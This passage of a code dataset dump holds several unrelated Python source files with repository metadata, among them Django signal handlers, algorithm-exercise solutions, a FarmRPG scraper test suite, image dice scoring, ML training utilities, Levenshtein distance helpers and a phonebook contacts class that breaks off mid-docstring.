\"__main__\":\n\tmain()\n","repo_name":"cryoem/eman2","sub_path":"sparx/bin/sxfactcoords.py","file_name":"sxfactcoords.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"47"} +{"seq_id":"6385883697","text":"# encoding: utf-8\n\"\"\"\n@desc: 评论模块信号\n\"\"\"\n\nfrom django.db.models.signals import m2m_changed\nfrom django.dispatch import receiver\n\nfrom .models import Review, Reply\n\n\n@receiver(m2m_changed, sender=Review.like_users.through)\ndef review_like_users_changed(sender, instance, **kwargs):\n \"\"\"\n 当评论喜欢数据发送变化时,更新其对应的人数\n :param sender:\n :param instance:\n :param kwargs:\n :return:\n \"\"\"\n instance.like_count = instance.like_users.count()\n instance.save()\n\n\n@receiver(m2m_changed, sender=Reply.like_users.through)\ndef reply_like_users_changed(sender, instance, **kwargs):\n \"\"\"\n 当回复喜欢数据发送变化时,更新其对应的人数\n :param sender:\n :param instance:\n :param kwargs:\n :return:\n \"\"\"\n instance.like_count = instance.like_users.count()\n instance.save()\n","repo_name":"menial-love/Django","sub_path":"reviews/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"8955371551","text":"import sys\nsys.stdin = open('input.txt')\n\n'''\n필요한 기능\n1. 해당 좌표에서 최대 벌꿀\n2. 순회하는 기능\n'''\n\ndef get_value(idx, M, C):\n visit = [0] * M\n idx_all = []\n for i in range(M):\n idx_all.append([idx[0],idx[1]+i])\n result_end = 0\n for i in range(M, 0,-1):\n def get_combi(n, start, temp,temp2, C):\n nonlocal visit # 모든 조합의 경우의 수를 구하는 함수\n nonlocal idx_all\n nonlocal result_end\n if len(temp) == n: # 조합의 개수가 원하는 수가 되는 함수 종료\n if sum(temp) > C:\n return\n else:\n if sum(temp2) >= result_end:\n result_end = sum(temp2)\n return\n for k in range(start, len(idx_all)): # start부터 순회하는데 다음 재귀를 호출 할 떄는 현재 i가 순회 시작점이 됨\n if visit[k] == 0:\n visit[k] = 1\n get_combi(n, k, temp + [arr[idx_all[k][0]][idx_all[k][1]]],temp2 + [(arr[idx_all[k][0]][idx_all[k][1]])**2], C)\n visit[k] = 0\n get_combi(i,0,[],[],C)\n\n return result_end\n\nT = int(input())\n\nfor tc in range(T):\n N, M, C = map(int, input().split())\n\n arr = [list(map(int, input().split())) for _ in range(N)]\n visited = [[0]*(N-M+1) for _ in range(N)]\n dp = [[-1]*(N-M+1) for _ in range(N)]\n\n result_arr = [[0]*(N-M+1) for _ in range(N)]\n for i in range(N):\n for j in range(N-M+1):\n for m in range(M):\n if j+m < N-M+1:\n visited[i][j+m] = 1\n if 0 <= j-m:\n visited[i][j-m] = 1\n if dp[i][j] == -1:\n dp[i][j] = get_value([i,j], M, C)\n\n dp2 = [[-1] * (N - M + 1) for _ in range(N)]\n for p in range(N):\n for q in range(N-M+1):\n if visited[p][q] == 1:\n continue\n else:\n if dp[p][q] == -1:\n dp[p][q] = get_value([p,q], M ,C)\n dp2[p][q] = dp[p][q]\n result_arr[i][j] = dp[i][j]+max(list(map(lambda n:max(n),dp2)))\n print(f'#{tc+1} {max(list(map(lambda n:max(n),result_arr)))}')\n\n\n\n","repo_name":"shoon95/algorithm-solving","sub_path":"swea/swea2115_벌꿀 채취/swea2115.py","file_name":"swea2115.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8536646213","text":"from connectors.generic import XMLConnector\nfrom sqlwrapper import *\nfrom connectors.generic import GenericBook\n\nclass Czytio(XMLConnector):\n\n #dict of xml_tag -> db_column_name translations\n xml_tag_dict = {\n 'external_id': ('./id', None),\n 'title': ('./title', ''),\n 
'url': ('./url', ''),\n        'authors': ('./authors', ''),\n        'formats': ('./format', ''),\n        'isbns': ('./isbn', ''),\n        'cover': ('./cover', ''),\n        'price': ('./price', 0),\n        'file_size': ('./size', 0),\n        'page_count' : ('./length', 0),\n    }\n\nBase = SqlWrapper.getBaseClass()\n\nclass CzytioBook(GenericBook, Base):\n    id = Column(Integer, primary_key = True)\n    #title\n    #url\n    #authors\n    #cover\n    price = Column(Integer) # price in grosze (1/100 PLN)\n    file_size = Column(Integer)\n    page_count = Column(Integer) \n","repo_name":"SpisTresci/spistresci","sub_path":"spistresci/connectors/specific/Czytio.py","file_name":"Czytio.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"26614043479","text":"from pathlib import Path\n\nimport httpx\nimport pytest\nfrom asgiref.sync import async_to_sync\n\nfrom .factories import ItemFactory\nfrom .models import Item\nfrom .parsers import ParsedIngredient, parse_item\nfrom .tasks import scrape_from_api\n\nFIXTURES_ROOT = Path(__file__).joinpath(\"../fixtures\").resolve()\n\n\n@pytest.fixture\ndef scissors() -> bytes:\n    return FIXTURES_ROOT.joinpath(\"item_scissors.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef mc02() -> bytes:\n    return FIXTURES_ROOT.joinpath(\"item_mystical_chest_02.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef cornucopia() -> bytes:\n    return FIXTURES_ROOT.joinpath(\"item_cornucopia.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef gb02() -> bytes:\n    return FIXTURES_ROOT.joinpath(\"item_grab_bag_02.html\").open(\"rb\").read()\n\n\n@pytest.fixture\ndef snowball() -> bytes:\n    return FIXTURES_ROOT.joinpath(\"item_snowball.html\").open(\"rb\").read()\n\n\ndef test_parse_recipe(scissors: bytes):\n    item = parse_item(scissors)\n    assert item.recipe == [\n        ParsedIngredient(id=95, quantity=1),\n        ParsedIngredient(id=38, quantity=1),\n        ParsedIngredient(id=145, quantity=2),\n        ParsedIngredient(id=40, quantity=1),\n        ParsedIngredient(id=35, quantity=2),\n    ]\n    assert item.locksmith == []\n    assert item.flea_market_price is None\n    assert item.from_event is False\n\n\ndef test_parse_locksmith(mc02: bytes):\n    item = parse_item(mc02)\n    assert item.recipe == []\n    assert item.locksmith == [\n        ParsedIngredient(id=350, quantity=3),\n        ParsedIngredient(id=500, quantity=3),\n        ParsedIngredient(id=538, quantity=3),\n        ParsedIngredient(id=266, quantity=1),\n        ParsedIngredient(id=373, quantity=2),\n    ]\n\n\ndef test_parse_locksmith_gold(cornucopia: bytes):\n    item = parse_item(cornucopia)\n    assert item.recipe == []\n    assert item.locksmith[0] == ParsedIngredient(id=0, gold=True, quantity=25)\n\n\ndef test_parse_fleamarket(gb02: bytes):\n    item = parse_item(gb02)\n    assert item.flea_market_price == 4\n\n\ndef test_parse_event(snowball: bytes):\n    item = parse_item(snowball)\n    assert item.from_event is True\n\n\n@pytest.mark.django_db\ndef test_scrape_from_api_grape_pie(respx_mock):\n    api_data = [\n        {\n            \"id\": 726,\n            \"xp\": 6500,\n            \"img\": \"/img/items/grapepie.png\",\n            \"name\": \"Concord Grape Pie\",\n            \"type\": \"item\",\n            \"can_buy\": 0,\n            \"can_sell\": 1,\n            \"cookable\": 1,\n            \"mailable\": 0,\n            \"buy_price\": 0,\n            \"craftable\": 0,\n            \"masterable\": 1,\n            \"reg_weight\": 3000,\n            \"sell_price\": 25000000,\n            \"description\": \"A super yummy pie full of grapes\",\n            \"cooking_level\": 40,\n            \"crafting_level\": 1,\n            \"runecube_weight\": 3000,\n            \"cooking_recipe_id\": 727,\n            \"base_yield_minutes\": 720,\n            \"min_mailable_level\": 0,\n            \"manfish_only\": 0,\n            \"loot_key_id\": 0,\n            
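# (assumption: the loot_* fields describe chest/key drops; they stay zero here\n            # because this fixture is a plain cookable item)\n            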
\"loot_rand\": 0,\n \"loot_gold\": 0,\n \"loot\": 0,\n \"event\": 0,\n \"fm_buy\": 0,\n \"fm_price\": 0,\n \"fm_rotate\": 0,\n }\n ]\n respx_mock.get(\"https://farmrpg.com/api/item/726\").mock(\n return_value=httpx.Response(200, json=api_data)\n )\n ItemFactory(id=727, name=\"Pie Recipe\")\n async_to_sync(scrape_from_api)(726)\n item = Item.objects.get(id=726)\n assert item.cooking_recipe_item.name == \"Pie Recipe\"\n","repo_name":"coderanger/farmrpg-etl2","sub_path":"src/farmrpg_etl/items/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13364036902","text":"from PIL import Image\r\nimport numpy as np\r\n\r\ndef compute_dice(label_img, pred_img, p_threshold=0.5):\r\n p = pred_img.astype(np.float32)\r\n l = label_img.astype(np.float32)\r\n if p.max() > 127:\r\n p /= 255.\r\n if l.max() > 127:\r\n l /= 255.\r\n\r\n p = np.clip(p, 0, 1.0)\r\n l = np.clip(l, 0, 1.0)\r\n p[p > p_threshold] = 1.0\r\n p[p < p_threshold] = 0.0\r\n l[l > p_threshold] = 1.0\r\n l[l < p_threshold] = 0.0\r\n product = np.dot(l.flatten(), p.flatten())\r\n dice_num = 2 * product + 1\r\n pred_sum = p.sum()\r\n label_sum = l.sum()\r\n dice_den = pred_sum + label_sum + 1\r\n dice_val = dice_num / dice_den\r\n return dice_val\r\n\r\n#input_path = '/home/jsy/font/new_font_120_500_1000_SR/fake_samples-154-450_train.png'\r\ninput_path = '/home/jsy/font/son_img/fake_samples-74-1050_train.png'\r\n### original base-GAN\r\n#input_path = '/home/jsy/font/son_fontGAN/fake_samples-261-100_train.png'\r\n#input_path = '/home/jsy/font/son_img/fake_samples-74-1050_train.png'\r\n### fine-tuning base-GAN\r\n\r\n#target_path = '/home/jsy/font/fixed_set/t_fixed_target2.png'\r\ntarget_path = '/home/jsy/font/fixed_set/t_fixed_target.png'\r\na = Image.open(input_path)\r\n#a = (np.ones((262, 1042, 3)) * 255).astype(np.uint8)\r\n\r\n# rand = np.random.rand(262, 1042, 3)\r\n# a = (rand * 255).astype(np.uint8)\r\n# a = (np.zeros((262, 1042, 3))).astype(np.uint8)\r\na = np.asarray(a)\r\n\r\nb = Image.open(target_path)\r\nb = np.asarray(b)\r\n\r\nscore = compute_dice(a, b)\r\nprint(score)","repo_name":"youwantsy/fontGAN","sub_path":"dice_score.py","file_name":"dice_score.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"5392372545","text":"import logging\n\n# a negative more than one eases debugging\nNOT_EXISTENT = 1000\n\ndef get_matrix_detailed(word1, word2):\n matrix = []\n prev_l = []\n # \"0\" is any character, just to make the initialization\n for i, c2 in enumerate(\"0\" + word2):\n logging.debug(f\"c2: {c2}\")\n l = []\n for j, c1 in enumerate(\"0\" + word1):\n\n candidates = []\n logging.debug(f\"c1: {c1}\")\n\n if len(prev_l) > 0 and len(l) > 0:\n diag = prev_l[j-1]\n if c1 == c2:\n if diag[3] == NOT_EXISTENT:\n candidates.append(0)\n else:\n candidates.append(diag[3])\n else:\n if diag[3] == NOT_EXISTENT:\n candidates.append(1)\n else:\n candidates.append(diag[3]+1)\n else:\n candidates.append(NOT_EXISTENT)\n logging.debug(f\"candidates after diag: {candidates}\")\n\n if len(prev_l) > 0:\n above = prev_l[j]\n if above[3] == NOT_EXISTENT:\n candidates.append(1)\n else:\n candidates.append(above[3]+1)\n else:\n candidates.append(NOT_EXISTENT)\n logging.debug(f\"candidates after above: {candidates}\")\n\n if len(l) > 0:\n left = l[j-1]\n if left[3] == NOT_EXISTENT:\n candidates.append(1)\n else:\n 
candidates.append(left[3]+1)\n else:\n candidates.append(NOT_EXISTENT)\n logging.debug(f\"candidates after left: {candidates}\")\n\n current = min(candidates)\n logging.debug(\"current\")\n logging.debug(current)\n\n candidates.append(current)\n l.append(candidates)\n\n prev_l = l\n matrix.append(l)\n\n return matrix\n\ndef get_matrix(word1, word2):\n matrix = []\n prev_l = []\n for i, c2 in enumerate(\"0\" + word2):\n l = []\n for j, c1 in enumerate(\"0\" + word1):\n\n candidates = []\n\n if len(prev_l) > 0:\n above = prev_l[j]\n candidates.append(above+1)\n\n if len(l) > 0:\n left = l[j-1]\n candidates.append(left+1)\n\n if len(prev_l) > 0 and len(l) > 0:\n diag = prev_l[j-1]\n if c1 == c2:\n candidates.append(diag)\n else:\n candidates.append(diag+1)\n\n current = min(candidates) if len(candidates) > 0 else 0\n l.append(current)\n\n prev_l = l\n matrix.append(l)\n\n return matrix\n\ndef display_matrix(word1, word2, matrix):\n out = \"\\n \" + \", \".join(word1) + \"\\n\"\n out += (len(out)-1) * \"-\" + \"\\n\"\n for i, l in enumerate(matrix):\n if (i >= 1):\n out += word2[i-1] + \"|\" + str(l) + \"\\n\"\n else:\n out += \" |\" + str(l) + \"\\n\"\n\n return out\n\ndef clean_list(l):\n newl = []\n for subl in l:\n newsubl = []\n for val in subl:\n if val == NOT_EXISTENT:\n newval = \" \"\n else:\n newval = str(val)\n newsubl.append(newval)\n newl.append(newsubl)\n logging.debug(f\"l: {l}\")\n logging.debug(f\"newl: {newl}\")\n return newl\n\ndef display_matrix_detailed(word1, word2, matrix):\n out = \"\\n \" + \" , \".join(word1) + \"\\n\"\n out += (len(out)-1) * \"-\" + \"\\n\"\n for i, l in enumerate(matrix):\n for j in range(2):\n if j == 0 and i >= 1:\n out += f\"{word2[i-1]}|\"\n else:\n out += \" |\"\n if j == 0:\n newl = [ f\"/{val[0]}, {val[1]}\\\\\" for val in clean_list(l)]\n out += \" \".join(newl) + \"\\n\"\n else: #j == 1\n newl = [ f\"\\{val[2]}, {val[3]}/\" for val in clean_list(l)]\n out += \",\".join(newl) + \"\\n\\n\"\n\n return out\n\ndef get_from_words(word1, word2):\n matrix = get_matrix(word1, word2)\n\n return matrix[-1][-1]\n\ndef get(matrix):\n return matrix[-1][-1]\n\n","repo_name":"weshouman/tut-py-irtx","sub_path":"tut_py_irtx/lev_dist.py","file_name":"lev_dist.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74868171983","text":"import math\nimport os\n\nimport torch\nfrom torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom tqdm import tqdm\n\n\ndef get_device():\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f\"[Info]: Use {device} now!\")\n return device\n\n\ndef build_dir(model_name):\n os.makedirs('checkpoints/{}'.format(model_name), exist_ok=True)\n\n\ndef get_cosine_schedule_with_warmup(\n optimizer: Optimizer,\n num_warmup_steps: int,\n num_training_steps: int,\n num_cycles: float = 0.5,\n last_epoch: int = -1,\n):\n \"\"\"\n Create a schedule with a learning rate that decreases following the values of the cosine function between the\n initial lr set in the optimizer to 0, after a warmup period during which it increases linearly between 0 and the\n initial lr set in the optimizer.\n\n Args:\n optimizer (:class:`~torch.optim.Optimizer`):\n The optimizer for which to schedule the learning rate.\n num_warmup_steps (:obj:`int`):\n The number of steps for the warmup phase.\n num_training_steps (:obj:`int`):\n The total number of training steps.\n num_cycles (:obj:`float`, `optional`, 
defaults to 0.5):\n The number of waves in the cosine schedule (the defaults is to just decrease from the max value to 0\n following a half-cosine).\n last_epoch (:obj:`int`, `optional`, defaults to -1):\n The index of the last epoch when resuming training.\n\n Return:\n :obj:`torch.optim.lr_scheduler.LambdaLR` with the appropriate schedule.\n \"\"\"\n def lr_lambda(current_step):\n # Warmup\n if current_step < num_warmup_steps:\n return float(current_step) / float(max(1, num_warmup_steps))\n # decadence\n progress = float(current_step - num_warmup_steps) / float(\n max(1, num_training_steps - num_warmup_steps))\n return max(\n 0.0, 0.5 *\n (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress)))\n\n return LambdaLR(optimizer, lr_lambda, last_epoch)\n\n\ndef model_fn(batch, model, criterion, device):\n \"\"\"Forward a batch through the model.\"\"\"\n\n mels, labels = batch\n mels = mels.to(device)\n labels = labels.to(device)\n\n outs = model(mels)\n\n loss = criterion(outs, labels)\n\n # Get the speaker id with highest probability.\n preds = outs.argmax(1)\n # Compute accuracy.\n accuracy = torch.mean((preds == labels).float())\n\n return loss, accuracy\n\n\ndef valid(dataloader, model, criterion, device):\n \"\"\"Validate on validation set.\"\"\"\n\n model.eval()\n running_loss = 0.0\n running_accuracy = 0.0\n pbar = tqdm(total=len(dataloader.dataset),\n ncols=0,\n desc=\"Valid\",\n unit=\" uttr\")\n\n for i, batch in enumerate(dataloader):\n with torch.no_grad():\n loss, accuracy = model_fn(batch, model, criterion, device)\n running_loss += loss.item()\n running_accuracy += accuracy.item()\n\n pbar.update(dataloader.batch_size)\n pbar.set_postfix(\n loss=f\"{running_loss / (i+1):.2f}\",\n accuracy=f\"{running_accuracy / (i+1):.2f}\",\n )\n\n pbar.close()\n model.train()\n\n return running_accuracy / len(dataloader)\n","repo_name":"SilenceX12138/Machine-Learning-Theory-and-Application","sub_path":"4-sequence-classification/utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"71389606222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 26 14:40:37 2019\r\n\r\n@author: Alex8Cabarcos\r\n\"\"\"\r\n\r\nimport fmpy\r\nfrom matplotlib import pyplot as plt\r\n\r\ndahl = 'Dahlquist1.fmu';\r\n#fmpy.dump(dahl)\r\n#results=fmpy.simulate_fmu(dahl)\r\n#results=fmpy.simulate_fmu(dahl,start_values={'x':3})\r\n#l =['hello',1.0,2];\r\n#print(l[0])\r\n#l.append('bye')\r\nresult = [];\r\nxStart = [i for i in range(11)]\r\n#list_a = list(range(11))\r\n#len(xStart)==len(list_a)\r\n\r\nfor i in xStart:\r\n rs = fmpy.simulate_fmu(dahl,start_values={'x':i},start_time=0,stop_time=5)\r\n result.append(rs)\r\n\r\nfor j in range(11): \r\n plt.plot(result[j]['time'],result[j]['x'])\r\n\r\n\r\nplt.xlabel(\"Time (s)\")\r\nplt.ylabel(\"x\")\r\nplt.grid(color='grey', linestyle='-', linewidth=2)\r\nkValues = [0,1,2,3,4,5,6,7,8,9]\r\nplt.legend(kValues)\r\n\r\n#dtype little-endian single-precision float\r\n#result[0].dtype.kind 'V'-> raw data","repo_name":"cabarcos19/Optmization","sub_path":"co_simulation.py","file_name":"co_simulation.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3250201663","text":"import os\n\nBASE_DIR = os.environ.get('BASE_DIR')\n\nMODEL_DIR = os.path.join(BASE_DIR, 'trained_models/')\nTMCD_MODEL_DIR = os.path.join(BASE_DIR, 
'baseline_replication/TMCD/trained_models/')\n\nDATA_DIR = os.path.join(BASE_DIR, 'data/')\nTMCD_DATA_DIR = os.path.join(BASE_DIR, 'baseline_replication/TMCD/data/')\n\nTMCD_DATASETS = {'SCAN', 'geoquery', 'spider'}\ndataset_color_mapping = {'COGS': '#313b08', 'SCAN': '#313b08', 'spider': '#520c35', 'geoquery': '#520c35', 'NACS': '#2b3a00'}\n\nMODEL_NICE_NAMES = {\n \"lstm_uni\": \"LSTM Uni\",\n \"lstm_bi\": \"LSTM Bi\",\n \"transformer\": \"Transformer\",\n \"t5-base\": \"T5\",\n \"bart-base\": \"BART\",\n \"btg\": \"BTG\"\n}\n\nPRETRAINED_MODEL = {'t5-base', 'bart-base', 'nqg'}\nUNPRETRAINED_MODEL = {'lstm_uni', 'lstm_bi', 'transformer', 'btg'} \nSYNTHETIC_DATA = {'SCAN', 'COGS', 'NACS'}\nNATURAL_DATA = {'geoquery', 'spider'}\n\nDATASET_NICE_NAMES = {\n \"COGS\": \"COGS\",\n \"geoquery\": \"GeoQuery\",\n \"SCAN\": \"SCAN\",\n \"spider\": \"Spider\",\n \"NACS\": \"NACS\"\n}\n\nSPLIT_NICE_NAMES = {\n \"standard\": \"Std\",\n \"length\": \"Length\",\n \"template\": \"Template\",\n \"tmcd\": \"TMCD\",\n \"random\": \"Rand\",\n \"no_mod-test\": \"Std-Test\",\n \"no_mod-gen\": \"Std-Gen\",\n \"simple\": \"Simple\",\n \"addprim_jump\": \"Jump\",\n \"addprim_turn_left\": \"TurnLeft\",\n \"template_around_right\": \"Template\",\n \"mcd1\": \"MCD1\",\n \"mcd2\": \"MCD2\",\n \"mcd3\": \"MCD3\",\n \"add_jump\": \"Jump\",\n \"add_turn_left\": \"TurnLeft\",\n # SCAN Lexical Split Names\n \"turn_left_random_cvcv\": \"TurnLeftRcvcv\",\n \"turn_left_random_str\": \"TurnLeftRStr\",\n \"jump_random_cvcv\": \"JumpRcvcv\",\n \"jump_random_str\": \"JumpRStr\",\n # COGS Lexical Split Names\n \"no_mod\": \"Std\",\n \"random_cvcv-test\": \"Rcvcv-Test\",\n \"random_cvcv-gen\": \"Rcvcv-Gen\",\n \"random_str-test\": \"Rstr-Test\",\n \"random_str-gen\": \"Rstr-Gen\",\n \"random_cvcv\": \"Randcvcv\",\n \"random_str\": \"RandStr\",\n # GeoQ Lexical Split Names\n \"standard_random_cvcv\": \"Std-Rcvcv\",\n \"standard_random_str\": \"Std-Rstr\",\n \"tmcd_random_cvcv\": \"TMCD-Rcvcv\",\n \"tmcd_random_str\": \"TMCD-Rstr\",\n}\n\ndefault_model_names = ['lstm_uni', 'lstm_bi', 'transformer', 't5-base', 'bart-base', 'btg']\ndefault_dataset_mapping = { \n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"COGS\": [\"no_mod-test\", \"no_mod-gen\"],\n \"geoquery\": [\"standard\", \"template\", \"tmcd\", \"length\"], \n \n \"SCAN\": [\"simple\", \"addprim_jump\", \"addprim_turn_left\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\"], \n \n }\n\nall_dataset_mapping = {\"COGS\": [\"no_mod-test\", \"random_cvcv-test\", \"random_str-test\",\n \"no_mod-gen\", \"random_cvcv-gen\", \"random_str-gen\", \"length\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\", \"addprim_turn_left\", \"turn_left_random_cvcv\", \"turn_left_random_str\"], \n \"geoquery\": [\"standard\", \"standard_random_cvcv\", \"standard_random_str\", \"template\", \"length\", \"tmcd\", \"tmcd_random_cvcv\", \"tmcd_random_str\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\nlexical_dataset_mapping = {\n \"COGS\": [\"no_mod-gen\", \"random_cvcv-test\", \"random_cvcv-gen\", \"random_str-test\", \"random_str-gen\"],\n \"SCAN\": [\"addprim_turn_left\", \"turn_left_random_cvcv\", \"turn_left_random_str\"],\n \"geoquery\": [\"standard\", \"standard_random_cvcv\", \"standard_random_str\", \"tmcd\", 
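        # note: the *_random_cvcv / *_random_str entries are the lexically
        # perturbed counterparts of the base splits, matching the "Lexical
        # Split Names" groups defined in SPLIT_NICE_NAMES above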
\"tmcd_random_cvcv\", \"tmcd_random_str\"]\n}\n\nlength_dataset_mapping = {\n \"COGS\": [\"length\"],\n \"SCAN\": [\"length\"],\n \"geoquery\": [\"length\"],\n \"spider\": [\"length\"],\n \"NACS\": [\"length\"]\n}\n\nall_exclude_length_dataset_mapping = {\"COGS\": [\"no_mod-test\", \"random_cvcv-test\", \"random_str-test\",\n \"no_mod-gen\", \"random_cvcv-gen\", \"random_str-gen\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"length\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"addprim_turn_left\", \"turn_left_random_cvcv\", \"turn_left_random_str\"], \n \"geoquery\": [\"standard\", \"standard_random_cvcv\", \"standard_random_str\", \"template\", \"length\", \"tmcd\", \"tmcd_random_cvcv\", \"tmcd_random_str\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\n\nraw_dataset_mapping = {\n \"COGS\": [\"no_mod-test\", \n \"no_mod-gen\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\", \"addprim_turn_left\"], \n \"geoquery\": [\"template\", \"length\", \"standard\", \"tmcd\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\nlexical_without_orig_dataset_mapping = {\n \"COGS\": [\"random_cvcv-test\", \"random_str-test\", \"random_cvcv-gen\", \"random_str-gen\"], \n \"spider\": [\"random\", \"template\", \"tmcd\", \"length\"],\n \"SCAN\": [\"simple\", \"addprim_jump\", \"template_around_right\", \"mcd1\", \"mcd2\", \"mcd3\", \"length\", \"addprim_turn_left\", \"turn_left_random_cvcv\"], \n \"geoquery\": [\"template\", \"length\", \"standard_random_cvcv\", \"standard_random_str\", \"tmcd_random_cvcv\", \"tmcd_random_str\"],\n \"NACS\": [\"simple\", \"add_jump\", \"add_turn_left\", \"length\"],\n }\nlexical_w_orig_mapping = {\n \"COGS\": {\n # \"no_mod-test\": [\"random_cvcv-test\", \"random_str-test\"],\n \"no_mod-gen\": [\"random_cvcv-gen\", \"random_str-gen\"]}, \n \"SCAN\": {\"addprim_turn_left\": [\"addprim_turn_left\", \"turn_left_random_cvcv\"]}, \n \"geoquery\": {\n # \"standard\": [\"standard_random_cvcv\", \"standard_random_str\"], \n \"tmcd\": [\"tmcd_random_cvcv\", \"tmcd_random_str\"]},\n}\n","repo_name":"facebookresearch/CompositionalityValidity","sub_path":"utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":6125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"846460698","text":"'''\n1021. Remove Outermost Parentheses\n\nA valid parentheses string is either empty (\"\"), \"(\" + A + \")\", or A + B, where \nA and B are valid parentheses strings, and + represents string concatenation. \nFor example, \"\", \"()\", \"(())()\", and \"(()(()))\" are all valid parentheses \nstrings.\n\nA valid parentheses string S is primitive if it is nonempty, and there does not \nexist a way to split it into S = A+B, with A and B nonempty valid parentheses \nstrings.\n\nGiven a valid parentheses string S, consider its primitive decomposition: \nS = P_1 + P_2 + ... 
+ P_k, where P_i are primitive valid parentheses strings.\n\nReturn S after removing the outermost parentheses of every primitive string in \nthe primitive decomposition of S.\n \nExample 1:\nInput: \"(()())(())\"\nOutput: \"()()()\"\nExplanation: \nThe input string is \"(()())(())\", with primitive decomposition \"(()())\" + \"(())\".\nAfter removing outer parentheses of each part, this is \"()()\" + \"()\" = \"()()()\".\n\nExample 2:\nInput: \"(()())(())(()(()))\"\nOutput: \"()()()()(())\"\nExplanation: \nThe input string is \"(()())(())(()(()))\", with primitive decomposition \n\"(()())\" + \"(())\" + \"(()(()))\".\nAfter removing outer parentheses of each part, this is \n\"()()\" + \"()\" + \"()(())\" = \"()()()()(())\".\n\nExample 3:\nInput: \"()()\"\nOutput: \"\"\nExplanation: \nThe input string is \"()()\", with primitive decomposition \"()\" + \"()\".\nAfter removing outer parentheses of each part, this is \"\" + \"\" = \"\".\n \nNote:\nS.length <= 10000\nS[i] is \"(\" or \")\"\nS is a valid parentheses string\n'''\n\n'''\nALGORITHM:\n1. Iterate on the string and keep track of count of open and close brackets.\n2. If c == '(' and open_count == close_count, skip this bracket\n3. If c == ')' and open_count == close_count, skip this bracket\n\nRUNTIME COMPLEXITY: O(N)\nSPACE COMPLEXITY: O(N) for storing result \n'''\n\nclass Solution(object):\n def removeOuterParentheses(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n opn, close = 0,0\n result = []\n for c in S:\n if c == '(':\n opn += 1\n if opn-1 != close:\n result.append(c)\n else:\n close += 1\n if opn != close:\n result.append(c) \n return ''.join(result)\n \n","repo_name":"renukadeshmukh/Leetcode_Solutions","sub_path":"1021_RemoveOutermostParentheses.py","file_name":"1021_RemoveOutermostParentheses.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"34072409960","text":"from models.contact import Contact\n\n\nclass Contacts():\n \"\"\"Contains and manages all contacts. 
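    Illustrative usage (made-up number; return strings per the method docs below):

        contacts = Contacts()
        contacts.add("Ada", "Lovelace", 700123456)  # "Contact added successfully!"
        contacts.edit(700123456, "Ada", "King")     # "Edit successful!"
        contacts.delete(700123456)                  # "Contact deleted!"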
This is a phonebook instance.\n\n Args:\n This class takes no arguments\n\n Returns:\n Returns nothing.\n\n \"\"\"\n\n def __init__(self):\n self.data = {}\n\n def add(self, firstname, surname, number):\n \"\"\"Function for adding contacts to the phonebook instance.\n\n Args:\n firstname: First name of the contact owner.\n surname: Surname of the contact owner.\n number: The actual phone number of the owner.\n\n Returns:\n Returns \"Contact added successfully!\" when a contact is added\n with no issues.\n Returns an error message, \"Contact exists!\" when an attempt to duplicate is noted.\n\n \"\"\"\n\n try:\n number = int(number)\n except TypeError:\n raise(TypeError)\n except ValueError:\n raise(ValueError)\n # only add non-existent contacts\n if number not in self.data.keys():\n self.contact = Contact(firstname, surname, number)\n self.data[self.contact.number] = [firstname, surname]\n return(\"Contact added successfully!\")\n else:\n return(\"Contact exists!\")\n\n def edit(self, number, firstname, surname):\n \"\"\"Function for editing contacts in the phonebook instance.\n\n Args:\n firstname: First name of the contact owner.\n surname: Surname of the contact 